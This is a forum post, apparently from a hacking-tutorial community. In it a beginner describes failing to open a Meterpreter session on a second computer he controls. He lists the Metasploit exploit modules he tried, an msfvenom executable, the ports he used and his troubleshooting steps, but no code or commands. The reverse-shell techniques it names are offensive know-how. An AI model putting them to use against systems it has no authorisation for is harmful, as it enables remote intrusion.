Forum Thread: Not Able to Open a Session.

Good afternoon Null-Byte,

I'm fairly new at this and have basic Linux skills but I learn fast and feel that I have done my due diligence to try to fix this on my own.. but I've hit a brick wall and I need your help, if you deem me worthy of it.

Now, to the problem at hand.

I have physical access to a 2nd computer that I'm trying to install a listener on but no matter what method I use or how vulnerable I make it, I can never get Meterpreter to open a session.

I disabled all protection on the target computer for simplicity's sake and followed master OTW's tutorial and used "adobe pdf embedded exe" but after checking the exploit database I realized it might not workl on Windows 8.1.

Then I tried a "java signed applet" tutorial I found but that didn't work either, maybe because it targets x86 while my target has x64. No biggie, next vulnerability.

Off to try "java rhino"! Seems to target all the right things. I installed all the vulnerable programs, sent it.. nothing.

At this point I was thinking I'm messing up some early steps, came back here and double, triple, quadruple-checked everything but it was all in order.

Then I completely removed all antivirus and firewalls from the target and used . Still nothing.

My latest attempt was creating a straight up .exe through msfvenom and see if that would work but still no session.

My limited troubleshooting skills included:
Making sure the host was listening.
Tried and re-tried all previous exploits on several different ports, 20, 80, 443 and the default 4444.
Re-install Kali.
Tried encoding it.
Pinged the hell out of both target and host.

And just for the hell of it, I installed Kali on the target computer and tried creating the listener from there to see if there was something wrong with my computer.

I feel like I'm missing something very simple that is right in front of my eyes and I'd greatly appreciate any and all help on the matter.

Ulf

13 Responses